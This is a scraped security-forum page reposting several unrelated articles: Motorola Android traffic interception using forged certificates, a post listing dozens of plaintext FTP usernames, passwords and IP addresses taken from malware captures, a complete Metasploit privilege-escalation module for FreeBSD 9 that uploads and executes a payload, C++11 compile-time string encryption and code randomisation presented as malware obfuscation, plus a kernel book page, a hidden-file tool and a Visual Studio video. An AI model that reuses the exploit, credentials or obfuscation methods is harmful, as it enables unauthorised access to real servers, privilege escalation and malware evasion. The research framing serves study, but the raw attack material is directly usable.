off, then back on. This seems to be necessary to cause all applications to recognize the new trusted certificate, and will also let you intercept the oAuth negotiation with Motorola. Configure and use anything in the Account section of the device. Use the built-in Social Networking application.
Take a picture and use the Share function to upload it to one or more photo-sharing services. Leave the device on for long enough that it sends other system data to Motorola automatically. Steps to reproduce - check-in data decompression If you'd like to decompress one of these gzipped data packages, there are also a number of approaches available, but this is the one I used: Export the raw (binary) request from your intercepting proxy's proxy history. In ZAP, right-click on the history entry and choose Save Raw -> Request -> Body. In Burp Suite, right-click on the history entry and choose Save Item, then uncheck the Base64-encode requests and responses box before saving. Note: you cannot use the bulk export feature of either tool for this step - both of them have a quirk in which exporting individual requests preserves binary data, but exporting in bulk corrupts binary data by converting a number of values to 0x3F (maybe it's some Java library that does that when exporting as ASCII?). Open the exported data in a hex editor (I use WinHex). Remove everything up to the first 0x1F8B in the file. See example screenshot below. Save the modified version (I added a .gz extension for clarity). See example screenshot below. Decompress the resulting file using e.g. the Linux gzip -d command or 7-Zip. Open the decompressed file in a text editor that correctly interprets Unix-style line breaks (I used Notepad++, partly because it shows unprintable characters in a useful way, and there is some binary data mixed in with the text in these files). Examine the data your phone is sending to Motorola.
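The manual hex-editor procedure above boils down to "find the first gzip magic number (0x1F 0x8B) and discard everything before it". If you'd rather script that step, here is a minimal sketch (my own, not from the original article); it assumes the exported request body contains a single gzip stream with nothing after it:

```python
import gzip

def extract_checkin_payload(path: str) -> bytes:
    """Strip everything before the first gzip magic number (0x1F 0x8B)
    and decompress what remains - the same thing the hex-editor steps do."""
    with open(path, "rb") as f:
        raw = f.read()
    start = raw.find(b"\x1f\x8b")
    if start == -1:
        raise ValueError("no gzip stream (0x1F8B) found in %s" % path)
    return gzip.decompress(raw[start:])
```

Run it against the raw request body exported from ZAP or Burp Suite and you get the same decompressed check-in data, without a round-trip through WinHex.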
[TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Manually removing extra data so the file will be recognized as gzipped [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] GZip header (0X1F8B) [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Hex editor view of the data [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Hex editing complete [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Steps to reproduce - XMPP communication channel This section requires more technical skill and time to replicate than the other two. Right now, it assumes that you have access to a Linux system that is set up with two network interfaces and which can be easily configured to forward all network traffic from the first interface to the second using iptables. If you have a system that is set up to run Mallory successfully already (even though you won't be using Mallory itself here), that would be ideal. I am preparing a detailed ground-up build document and will release that shortly. In the meantime, assuming you have such a system and some experience using this sort of thing, download XMPPPeek and you should have the tool you need. Generate an SSL server certificate and private key (in PEM format) with the common name of *.svcmot.com. I made all of the elements of my forged cert match the real one as closely as possible, but I don't know how important this is other than the common name. Load the CA cert you signed the *.svcmot.com cert with onto your Motorola Android device. 
Again, I used a CA cert that matched the human-readable elements of the one used by the real server, but I don't know how important that is in this specific case. You may need to explicitly install the forged *.svcmot.com cert onto your Motorola Android device as well. Run the shell script from the XMPPPeek page to cause all traffic from the internal interface to be forwarded to the external interface, with the exception of traffic with a destination port of 5222, which should be routed to the port that XMPPPeek will be listening on. Start XMPPPeek and wait for your phone to connect. I used a VirtualBox VM with a virtual NIC which was connected for internet access, and a USB NIC which I connected to an old wireless access point. So my phone connected to that AP, which connected through the man-in-the-middle system, which connected to the actual internet connection. I configured the phone to also proxy web traffic through OWASP ZAP so that I could match up the XMPP traffic with its HTTP and HTTPS counterparts. Footnotes [TABLE=class: FootnoteTable] [TR] [TD=class: FootnoteNumberCell] 1. [/TD] [TD=class: FootnoteContentCell] For example, with the default Windows ICS configuration, you can bind the proxy to 192.168.137.1:8071. [/TD] [/TR] [TR] [TD=class: FootnoteNumberCell] 2. [/TD] [TD=class: FootnoteContentCell] Mine starts with a 4, but does not pass a Luhn check, in case you were curious. [/TD] [/TR] [/TABLE] Sursa: Motorola Is Listening - Projects - Beneath the Waves
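Once XMPPPeek is logging the decrypted stream, the interesting part is the Sync push message shown in the example session earlier. Its payload is plain JSON, so mapping the pushed app IDs back to the handler names from the table above takes only a few lines. This is my own sketch, and the field meanings ("d" carrying a "sync_app_id: N" string) are inferred from the single message format observed in testing:

```python
import json

# Handler names taken from the sync-app-ID table earlier in the article.
SYNC_HANDLERS = {
    2: "BlurSettingsSyncHandler", 5: "BlurSetupSyncHandler",
    10: "BlurContactsSyncHandler", 20: "SNMailSyncHandler",
    31: "StatusSyncHandler", 40: "BlurSNFriendsSyncHandler",
    50: "NewsRetrievalService", 60: "AdminFlunkySyncHandler",
    70: "FeedReceiverService", 80: "SNCommentsSyncHandler",
}

def decode_sync_push(payload: str):
    """Extract (app_id, handler_name) pairs from a Blur Sync push payload,
    e.g. {"Sync":{"APP":[{"d":"sync_app_id: 31\\n","q":0}]}}."""
    results = []
    for entry in json.loads(payload).get("Sync", {}).get("APP", []):
        for line in entry.get("d", "").splitlines():
            if line.startswith("sync_app_id:"):
                app_id = int(line.split(":", 1)[1])
                results.append((app_id, SYNC_HANDLERS.get(app_id, "unknown")))
    return results
```

Feeding it the captured message from the session above yields (31, "StatusSyncHandler"), matching the sync request the phone then makes over HTTP.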
-
Infiltrating malware servers without doing anything
Nytro replied to Nytro's topic in Tutoriale in engleza
Damn cURL... For those of you still making requests with that piece-of-crap cURL, make sure you replace spaces in the URL with "+": curl_setopt($ch, CURLOPT_URL, str_replace(' ', '+', $_GET['url'])); -
[h=3]Infiltrating malware servers without doing anything[/h] Today i was searching more samples of BlackPOS because this malware use FTP protocol. And knowing this, i was interested to crawl more panels but then i realised something... Why did i look only for BlackPOS, instead of targeting everything ? So i downloaded a random malware pack found on internet and send everything to Cuckoo. After i've just parsed each of these generated pcaps to get some stuff (simple but effective) Everything automated of course, it's too enormous to do that manually, especially on malware pack. Cuckoo. pcap junkie. Here is a small part: ftp://u479622:y6yf2023@212.46.196.140 - Win32/Usteal ftp://4bf3-cheats:hydsaww56785678@193.109.247.80 - Win32/Usteal ftp://u445497390:090171qq@31.170.164.56 - Win32/Usteal ftp://raprap8:9Y7cGxOW@89.108.68.81 - Win32/Usteal ftp://u195253707:1997qwerty@31.170.165.230 - Win32/Usteal ftp://pronzo_615:f4690x0nq8@91.223.216.18 - Win32/Usteal ftp://lordben8:xCoMFM2c@89.108.68.89 - Win32/Usteal ftp://u698037800:denisok1177@31.170.165.251 - Win32/Usteal ftp://u268995895:vovamolkov123@31.170.165.187 - Win32/Usteal ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.gen!A ftp://oiadoce:cremado33@187.17.122.141 - Win32/Delf.P ftp://cotuno:nokia400@198.23.57.29 - Win32/SecurityXploded.A ftp://fake01:13758@81.177.6.51 - WS.Reputation.1 ftp://h51694:2222559@91.227.16.13 - Win32/Usteal ftp://fintzet5@mail.ru:856cc58e698f@93.189.41.96 - Win32/Usteal ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Usteal ftp://h51694:2222559@91.227.16.13 - Win32/Ganelp.E ftp://450857:6a5124c7@83.125.22.167 - Win32/Ganelp.gen!A ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.gen!A ftp://getmac:8F4ODYLQlvpjjQ==@222.35.250.56 - Win32/Ganelp.G ftp://u797638036:951753zx@31.170.165.29 - Virus.Downloader.Rozena ftp://b12_8082975:djdf3549384@10.0.2.15 - Win32/Ganelp.gen!A ftp://onthelinux:741852abc@209.202.252.54 - Win32/Ganelp.E ftp://b12_8082975:951753zx@209.190.85.253 - 
Win32/Ganelp.E ftp://450857:6a5124c7@83.125.22.167 - Win32/Ganelp.gen!A ftp://u206748555:as3515789@31.170.165.165 - Win32/Usteal ftp://fintzet5@mail.ru:856cc58e698f@93.189.41.96 - Win32/Usteal ftp://griptoloji:3INULAX@46.16.168.174 - Win32/Usteal ftp://u459704296:ded7753191ded@31.170.164.244 - Win32/Usteal ftp://dedmen2:reaper24chef@176.9.52.231 - Win32/Usteal ftp://srv35913:JLN18Hp7@78.110.50.123 - F*ck this shit ftp://ftp1970492:ziemniak123@213.202.225.201 - F*ck this shit ftp://dron2258:NRm8CNfW@89.108.68.89 - F*ck this shit ftp://u996543000:123456789a@31.170.165.235 - F*ck this shit ftp://u500739002:jd7H2ni99s@31.170.165.199 - F*ck this shit ftp://0dmaer:1780199d@193.109.247.83 - F*ck this shit ftp://u404100999:vardan123@31.170.164.25 - F*ck this shit ftp://a9951823:www.ry123456@31.170.161.56 - F*ck this shit ftp://u194291799:80997171405@31.170.165.18 - F*ck this shit ftp://u478149:qqgclnbi@212.46.196.140 - F*ck this shit ftp://u114972719:1052483w@31.170.165.192 - F*ck this shit ftp://a1954396:omeromer123@31.170.162.103 - F*ck this shit ftp://googgle.ueuo.com:741852@5.9.82.27 - F*ck this shit ftp://fr32920:Nw3hRUme@92.53.98.21 - F*ck this shit ftp://u974422848.root:vertrigo@31.170.164.119 - F*ck this shit ftp://u205783311:gomogej200897z@31.170.165.192 - F*ck this shit ftp://u188483768:andrewbogdanov1@31.170.165.251 - F*ck this shit ftp://coinmint@coinslut.com:c01nm1nt!@108.170.30.2 - F*ck this shit ftp://agooga:nokiamarco@198.23.57.29 - F*ck this shit ftp://nicusn:n0305441@198.23.57.29 - F*ck this shit ftp://u355595964:xmNmK4CfvX@31.170.165.193 - F*ck this shit ftp://fmstu421:oxjQG1i7@46.4.94.180 - F*ck this shit ftp://u651787226:123698745s@31.170.164.98 - F*ck this shit ftp://u492312765:530021354@31.170.165.250 - F*ck this shit ftp://mandaryn:m0jak0chanaania@213.180.150.18 - F*ck this shit ftp://spechos8:onxGoTDG@89.108.68.85 - F*ck this shit ftp://6fidaini:vardan123@193.109.247.80 - F*ck this shit ftp://8steamsell:frozenn1@195.216.243.45 - F*ck this shit 
ftp://u478644:57zw1q56@212.46.196.138 - F*ck this shit ftp://u478230:lytlz3ub@212.46.196.133 - F*ck this shit ftp://u730739228:warhammer3@31.170.165.238 - F*ck this shit ftp://sme8:y6kByIZA@89.108.68.85 - F*ck this shit ftp://koctbijib1@mail.ru:83670bb9072b@93.189.41.100 - F*ck this shit ftp://u457127536:741852963q@31.170.165.245 - F*ck this shit ftp://u450728967:987456987@31.170.165.187 - F*ck this shit ftp://u730739228:warhammer3@31.170.165.238 - F*ck this shit ftp://0lineage2-world:plokijuh@195.216.243.7 - F*ck this shit ftp://expox@1:0628262733Y@188.40.138.148 - F*ck this shit ftp://admin@enhanceviews.elementfx.com:123456@198.91.81.3 - F*ck this shit ftp://ih_3676461:123456@209.190.85.253 - F*ck this shit ftp://0alfa-go-cs:killer2612@195.216.243.45 - F*ck this shit ftp://5nudapac:nudapac@195.216.243.82 - F*ck this shit ftp://450857:6a5124c7@83.125.22.167 - F*ck this shit I've added signature manually by browsing VirusTotal report but i got too many results so i've just leaved 'F*ck this shit' to all of them. Crawling VirusTotal with the API can be also an idea to retrieve results but i'm lazy. Looking at random pcap i've found some was fun: Malware using free hosting service is a bad idea: Malware builded with wrong datas (epic failure) Malware badly coded: Infecting yourself with Ardamax and enabling all features on it is a bad idea: Another configuration failure: FTP's full of sh*t: You can learn about actors, eg from dedmen2@176.9.52.231, emo boy (i've included him on the ftp list): Protip: don't buy a Nikon Coolpix L14v1.0, low quality picture. I got also some false positive, this one is fun because it's a server against malware infection: I have no idea why UsbFix was on a malware pack, anyway the use of FTP protocol for legit tools is also a bad idea, and this is not the only 'anti-malware' server i've found, got some weird stuff for viral update and many others, this technic is a double edged sword but most of result lead on malware servers. 
Posted by Steven K at 00:18 Sursa: XyliBox: Infiltrating malware servers without doing anything
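The pcap-mining pass described in the post (run the samples through Cuckoo, then pull FTP logins out of each capture) comes down to pairing up USER and PASS commands per connection. A stdlib-only sketch of that step - assuming the TCP payload has already been dumped as text, e.g. by following the stream in Wireshark, and not the author's actual tooling:

```python
import re

def extract_ftp_logins(stream_text: str, host: str):
    """Pair FTP USER/PASS commands from one TCP stream's payload text
    and emit ftp://user:pass@host URLs like the list in the post."""
    users = re.findall(r"^USER (\S+)", stream_text, re.MULTILINE)
    passwords = re.findall(r"^PASS (\S+)", stream_text, re.MULTILINE)
    return ["ftp://%s:%s@%s" % (u, p, host) for u, p in zip(users, passwords)]
```

Point it at each stream in a Cuckoo-generated pcap and you get exactly the kind of ftp://user:pass@ip list shown above; checking which credentials belong to malware panels versus false positives (like the UsbFix server) still has to be done by hand or via VirusTotal.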
-
Linux Kernel in a Nutshell

This is the web site for the book, Linux Kernel in a Nutshell, by Greg Kroah-Hartman, published by O'Reilly.

About

To quote the "official" O'Reilly site for the book:

Written by a leading developer and maintainer of the Linux kernel, Linux Kernel in a Nutshell is a comprehensive overview of kernel configuration and building, a critical task for Linux users and administrators. No distribution can provide a Linux kernel that meets all users' needs. Computers big and small have special requirements that require reconfiguring and rebuilding the kernel. Whether you are trying to get sound, wireless support, and power management working on a laptop or incorporating enterprise features such as logical volume management on a large server, you can benefit from the insights in this book.

Linux Kernel in a Nutshell covers the entire range of kernel tasks, starting with downloading the source and making sure that the kernel is in sync with the versions of the tools you need. In addition to configuration and installation steps, the book offers reference material and discussions of related topics such as control of kernel options at runtime. A key benefit of the book is a chapter on determining exactly what drivers are needed for your hardware. Also included are recipes that list what you need to do to accomplish a wide range of popular tasks.

To quote me, the author of the book:

If you want to know how to build, configure, and install a custom Linux kernel on your machine, buy this book. It is written by someone who spends every day building, configuring, and installing custom kernels as part of the development process of this fun, collaborative project called Linux. I'm especially proud of the chapter on how to figure out how to configure a custom kernel based on the hardware running on your machine. This is an essential task for anyone wanting to wring out the best possible speed and control of your hardware.

Audience

This book is intended to cover everything that is needed to know in order to properly build, customize, and install the Linux kernel. No programming experience is needed to understand and use this book. Some familiarity with how to use Linux, and some basic command-line usage, is expected of the reader. This book is not intended to go into the programming aspects of the Linux kernel; there are many other good books listed in the Bibliography that already cover this topic.

Secret Goal (i.e. why I wrote this book and am giving it away for free online)

I want this book to help bring more people into the Linux kernel development fold. The act of building a customized kernel for your machine is one of the basic tasks needed to become a Linux kernel developer. The more people that try this out, and realize that there is not any real magic behind the whole Linux kernel process, the more people will be willing to jump in and help out in making the kernel the best that it can be.

License

This book is available under the terms of the Creative Commons Attribution-ShareAlike 2.5 license. That means that you are free to download and redistribute it. The development of the book was made possible, however, by those who purchase a copy from O'Reilly or elsewhere.

Kernel version

The book is current as of the 2.6.18 kernel release; newer kernel versions will cause some of the configuration items to move around, and new configuration options will be added. However, the main concepts in the book remain valid for any kernel version released.

Downloads

The book is available for download in either PDF or DocBook format, for the entire book or by individual chapter. The entire history of the development of the book (you too can see why the first versions of the book were 1000 pages long) can be downloaded in a git repository.

Linux Kernel in a Nutshell chapter files:

- Title page (PDF)
- Copyright and credits (PDF)
- Preface (PDF, DocBook)
- Part I: Building the Kernel (PDF, DocBook)
- Chapter 1: Introduction (PDF, DocBook)
- Chapter 2: Requirements for Building and Using the Kernel (PDF, DocBook)
- Chapter 3: Retrieving the Kernel Source (PDF, DocBook)
- Chapter 4: Configuring and Building (PDF, DocBook)
- Chapter 5: Installing and Booting from a Kernel (PDF, DocBook)
- Chapter 6: Upgrading a Kernel (PDF, DocBook)
- Part II: Major Customizations (PDF, DocBook)
- Chapter 7: Customizing a Kernel (PDF, DocBook)
- Chapter 8: Kernel Configuration Recipes (PDF, DocBook)
- Part III: Kernel Reference (PDF, DocBook)
- Chapter 9: Kernel Boot Command-Line Parameter Reference (PDF, DocBook)
- Chapter 10: Kernel Build Command-Line Reference (PDF, DocBook)
- Chapter 11: Kernel Configuration Option Reference (PDF, DocBook)
- Part IV: Additional Information (PDF, DocBook)
- Appendix A: Helpful Utilities (PDF, DocBook)
- Appendix B: Bibliography (PDF, DocBook)
- Index (PDF)

Full Book Downloads:

- Tarball of all LKN PDF files (3MB)
- Tarball of all LKN DocBook files (1MB)

git tree of the book source can be browsed at http://git2.kernel.org/git/?p=linux/kernel/git/gregkh/lkn.git. To clone this tree, run:

git clone git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/lkn.git

Sursa: Linux Kernel in a Nutshell
-
[h=1]FreeBSD 9 Address Space Manipulation Privilege Escalation[/h]

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      {
        'Name'           => 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
        'Description'    => %q{
          This module exploits a vulnerability that can be used to modify
          portions of a process's address space, which may lead to privilege
          escalation. Systems such as FreeBSD 9.0 and 9.1 are known to be
          vulnerable.
        },
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'Konstantin Belousov', # Discovery
            'Alan Cox',            # Discovery
            'Hunger',              # POC
            'sinn3r'               # Metasploit
          ],
        'Platform'       => [ 'bsd' ],
        'Arch'           => [ ARCH_X86 ],
        'SessionTypes'   => [ 'shell' ],
        'References'     =>
          [
            [ 'CVE', '2013-2171' ],
            [ 'OSVDB', '94414' ],
            [ 'EDB', '26368' ],
            [ 'BID', '60615' ],
            [ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ]
          ],
        'Targets'        => [ [ 'FreeBSD x86', {} ] ],
        'DefaultTarget'  => 0,
        'DisclosureDate' => "Jun 18 2013",
      }
    ))

    register_options([
      # It isn't OptPath because it's a *remote* path
      OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
    ], self.class)
  end

  def check
    res = session.shell_command_token("uname -a")
    return Exploit::CheckCode::Appears if res =~ /FreeBSD 9\.[01]/
    Exploit::CheckCode::Safe
  end

  def write_file(fname, data)
    oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"
    session.shell_command_token("printf \"#{oct_data}\" > #{fname}")
    session.shell_command_token("chmod +x #{fname}")
    chk = session.shell_command_token("file #{fname}")
    return (chk =~ /ERROR: cannot open/) ? false : true
  end

  def upload_payload
    fname = datastore['WritableDir']
    fname = "#{fname}/" unless fname =~ %r'/$'

    if fname.length > 36
      fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters")
    end

    fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}"
    p = generate_payload_exe
    f = write_file(fname, p)
    return nil if not f
    fname
  end

  def generate_exploit(payload_fname)
    #
    # Metasm does not support FreeBSD executable generation.
    #
    path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
    x = File.open(path, 'rb') { |f| f.read(f.stat.size) }
    x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))
  end

  def upload_exploit(payload_fname)
    fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
    bin = generate_exploit(payload_fname)
    f = write_file(fname, bin)
    return nil if not f
    fname
  end

  def exploit
    payload_fname = upload_payload
    fail_with(Exploit::Failure::NotFound, "Payload failed to upload") if payload_fname.nil?
    print_status("Payload #{payload_fname} uploaded.")

    exploit_fname = upload_exploit(payload_fname)
    fail_with(Exploit::Failure::NotFound, "Exploit failed to upload") if exploit_fname.nil?
    print_status("Exploit #{exploit_fname} uploaded.")

    register_files_for_cleanup(payload_fname, exploit_fname)

    print_status("Executing #{exploit_fname}")
    cmd_exec(exploit_fname)
  end
end

Sursa: FreeBSD 9 Address Space Manipulation Privilege Escalation
-
Hidden File Finder is a free tool to quickly scan and discover all the hidden files on your Windows system.

It performs a swift multi-threaded scan of all folders in parallel and quickly uncovers all the hidden files. It automatically detects hidden executable files (EXE, DLL, COM etc.) and shows them in red for easier identification. Similarly, hidden files are shown in black and hidden folders in blue.

One of its main features is the Unhide operation: you can select one or all of the discovered hidden files and unhide them with just a click. Successful unhide operations are shown with a green background, failed ones with yellow.

It is very easy to use with its GUI interface, and will be particularly handy for penetration testers and forensic investigators. It is fully portable and works on both 32-bit and 64-bit platforms, from Windows XP to Windows 8.

Features

- Free, easy-to-use GUI-based software
- Fast multi-threaded hidden-file finder to quickly scan an entire computer, drive or folder
- Unhide all the hidden files with one click
- Color-based representation of hidden files/folders/executables and unhide operations
- Open the containing folder in Explorer by double-clicking an entry in the list
- Sort feature to arrange the hidden files by name/size/type/date/path
- Detailed hidden-file scan report in HTML format
- Fully portable and can be run from anywhere
- Also includes an installer for local installation/un-installation

Screenshots

Screenshot 1: Hidden File Finder showing all the hidden files/folders discovered during the scan
Screenshot 2: Detailed HTML report of the hidden-file scanning operation

Release History

Version 1.0: 25th Jun 2013 - First public release of HiddenFileFinder

Download

FREE Download Hidden File Finder v1.0
License: Freeware
Platform: Windows XP, 2003, Vista, Windows 7, Windows 8

Sursa: Hidden File Finder : Free Tool to Find and Unhide/Remove all the Hidden Files | www.SecurityXploded.com
-
[h=1]Visual Studio 2013 Preview[/h]

By: Robert Green

Visual Studio 2013 Preview is here with lots of exciting new features across Windows Store, desktop and web development. Dmitry Lyalin joins Robert for a whirlwind tour of this preview of the next release of Visual Studio, which is now available for download.

Dmitry and Robert show the following in this episode:

- Recap of Team Foundation Service announcements from TechEd [02:00], including Team Rooms for collaboration, code comments in changesets, mapping backlog items to features
- IDE improvements [11:00], including more color and redesigned icons, an undockable Pending Changes window, Connected IDE and synchronized settings
- Productivity improvements [17:00], including CodeLens indicators showing references, changes and unit test results, the enhanced scrollbar, and Peek Definition for inline viewing of definitions
- Web development improvements [28:00], including Browser Link for connecting Visual Studio directly to browsers, and One ASP.NET
- Debugging and diagnostics improvements [37:00], including edit and continue in 64-bit projects, managed memory analysis in memory dump files, the Performance and Diagnostics hub to centralize analysis tools [44:00], and async debugging [51:00]
- Windows Store app development improvements, including new project templates [40:00], Energy Consumption and XAML UI Responsiveness analyzers [45:00], new controls in XAML and JavaScript [55:00], and enhanced IntelliSense and Go To Definition in XAML files [1:00:00]

Visual Studio 2013 and Windows 8.1:
- Visual Studio 2013 Preview download
- Visual Studio 2013 Preview announcement
- Windows 8.1 Preview download
- Windows 8.1 Preview announcement

Additional resources:
- Visual Studio team blog
- Brian Harry's blog
- ALM team blog
- Web tools team blog
- Modern Application Lifecycle Management talk at TechEd
- Microsoft ASP.NET, Web, and Cloud Tools Preview talk at TechEd
- Using Visual Studio 2013 to Diagnose .NET Memory Issues in Production
- What's new in XAML talk at Build
- What's new in WinJS talk at Build

[h=3]Download[/h]

[h=3]How do I download the videos?[/h]
To download, right click the file type you would like and pick "Save target as…" or "Save link as…"

[h=3]Why should I download videos from Channel9?[/h]
It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3!

[h=3]Which version should I choose?[/h]
If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click "Save as…"

- MP3 (Audio only): 58.9 MB
- MP4 (iPod, Zune HD): 355.3 MB
- Mid Quality WMV (Lo-band, Mobile): 174.0 MB
- High Quality MP4 (iPad, PC): 781.7 MB
- Mid Quality MP4 (WP7, HTML5): 545.2 MB
- High Quality WMV (PC, Xbox, MCE)

Sursa: Visual Studio 2013 Preview | Visual Studio Toolbox | Channel 9
-
[h=1]Malware related compile-time hacks with C++11[/h]

by LeFF

Hello, community! This code shows how some features of the new C++11 standard can be used to randomly and automatically obfuscate code for every build you make (so for every build you will have different hash values, different encrypted strings and so on)... I decided to show examples of random code generation, string hashing and string encryption only, as more complex ones get much harder to read... The code is filled with comments and pretty self-explanatory, but if you have some questions, feel free to ask... Hope this stuff will be useful for you, guys!

#include <stdio.h>
#include <stdint.h>

//-------------------------------------------------------------//
// "Malware related compile-time hacks with C++11" by LeFF     //
// You can use this code however you like, I just don't really //
// give a shit, but if you feel some respect for me, please    //
// don't cut off this comment when copy-pasting... ;-)         //
//-------------------------------------------------------------//

// Usage examples:
void exampleRandom1() __attribute__((noinline));
void exampleRandom2() __attribute__((noinline));
void exampleHashing() __attribute__((noinline));
void exampleEncryption() __attribute__((noinline));

#ifndef vxCPLSEED
// If you don't specify the seed for algorithms, the time when compilation
// started will be used, seed actually changes the results of algorithms...
#define vxCPLSEED ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \
                   (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \
                   (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000)
#endif

// The constantify template is used to make sure that the result of a constexpr
// function will be computed at compile-time instead of run-time
template <uint32_t Const> struct vxCplConstantify { enum { Value = Const }; };

// Compile-time mod of a linear congruential pseudorandom number generator,
// the actual algorithm was taken from the "Numerical Recipes" book
constexpr uint32_t vxCplRandom(uint32_t Id) {
    return (1013904223 + 1664525 * ((Id > 0) ? (vxCplRandom(Id - 1)) : (vxCPLSEED))) & 0xFFFFFFFF;
}

// Compile-time random macros, can be used to randomize execution
// path for separate builds, or compile-time trash code generation
#define vxRANDOM(Min, Max) (Min + (vxRAND() % (Max - Min + 1)))
#define vxRAND() (vxCplConstantify<vxCplRandom(__COUNTER__ + 1)>::Value)

// Compile-time recursive mod of a string hashing algorithm,
// the actual algorithm was taken from the Qt library (this
// function isn't case sensitive due to vxCplTolower)
constexpr char vxCplTolower(char Ch) {
    return (Ch >= 'A' && Ch <= 'Z') ? (Ch - 'A' + 'a') : (Ch);
}
constexpr uint32_t vxCplHashPart3(char Ch, uint32_t Hash) {
    return ((Hash << 4) + vxCplTolower(Ch));
}
constexpr uint32_t vxCplHashPart2(char Ch, uint32_t Hash) {
    return (vxCplHashPart3(Ch, Hash) ^ ((vxCplHashPart3(Ch, Hash) & 0xF0000000) >> 23));
}
constexpr uint32_t vxCplHashPart1(char Ch, uint32_t Hash) {
    return (vxCplHashPart2(Ch, Hash) & 0x0FFFFFFF);
}
constexpr uint32_t vxCplHash(const char* Str) {
    return (*Str) ? (vxCplHashPart1(*Str, vxCplHash(Str + 1))) : (0);
}

// Compile-time hashing macro, the hash value changes using the first pseudorandom number in the sequence
#define vxHASH(Str) (uint32_t)(vxCplConstantify<vxCplHash(Str)>::Value ^ vxCplConstantify<vxCplRandom(1)>::Value)

// Compile-time generator for a list of indexes (0, 1, 2, ...)
template <uint32_t...> struct vxCplIndexList {};
template <typename IndexList, uint32_t Right> struct vxCplAppend;
template <uint32_t... Left, uint32_t Right> struct vxCplAppend<vxCplIndexList<Left...>, Right> {
    typedef vxCplIndexList<Left..., Right> Result;
};
template <uint32_t N> struct vxCplIndexes {
    typedef typename vxCplAppend<typename vxCplIndexes<N - 1>::Result, N - 1>::Result Result;
};
template <> struct vxCplIndexes<0> {
    typedef vxCplIndexList<> Result;
};

// Compile-time string encryption of a single character
const char vxCplEncryptCharKey = vxRANDOM(0, 0xFF);
constexpr char vxCplEncryptChar(const char Ch, uint32_t Idx) {
    return Ch ^ (vxCplEncryptCharKey + Idx);
}

// Compile-time string encryption class
template <typename IndexList> struct vxCplEncryptedString;
template <uint32_t... Idx> struct vxCplEncryptedString<vxCplIndexList<Idx...> > {
    char Value[sizeof...(Idx) + 1]; // Buffer for a string

    // Compile-time constructor
    constexpr inline vxCplEncryptedString(const char* const Str)
        : Value({ vxCplEncryptChar(Str[Idx], Idx)... }) {}

    // Run-time decryption
    char* decrypt() {
        for(uint32_t t = 0; t < sizeof...(Idx); t++) {
            this->Value[t] = this->Value[t] ^ (vxCplEncryptCharKey + t);
        }
        this->Value[sizeof...(Idx)] = '\0';
        return this->Value;
    }
};

// Compile-time string encryption macro
#define vxENCRYPT(Str) (vxCplEncryptedString<vxCplIndexes<sizeof(Str) - 1>::Result>(Str).decrypt())

// A small random code path example
void exampleRandom1() {
    switch(vxRANDOM(1, 4)) {
        case 1: { printf("exampleRandom1: Code path 1!\n"); break; }
        case 2: { printf("exampleRandom1: Code path 2!\n"); break; }
        case 3: { printf("exampleRandom1: Code path 3!\n"); break; }
        case 4: { printf("exampleRandom1: Code path 4!\n"); break; }
        default: { printf("Fucking poltergeist!\n"); }
    }
}

// A small random code generator example
void exampleRandom2() {
    volatile uint32_t RndVal = vxRANDOM(0, 100);
    if(vxRAND() % 2) {
        RndVal += vxRANDOM(0, 100);
    } else {
        RndVal -= vxRANDOM(0, 200);
    }
    printf("exampleRandom2: %d\n", RndVal);
}

// A small string hashing example
void exampleHashing() {
    printf("exampleHashing: 0x%08X\n", vxHASH("hello world!"));
    printf("exampleHashing: 0x%08X\n", vxHASH("HELLO WORLD!"));
}

void exampleEncryption() {
    printf("exampleEncryption: %s\n", vxENCRYPT("Hello world!"));
}

extern "C" void Main() {
    exampleRandom1();
    exampleRandom2();
    exampleHashing();
    exampleEncryption();
}

To build the code with GCC/MinGW I used this command:

g++ -o main.exe -m32 -std=c++0x -Wall -O3 -Os -fno-exceptions -fno-rtti -flto -masm=intel -e_Main -nostdlib -O3 -Os -flto -s main.cpp -lmsvcrt

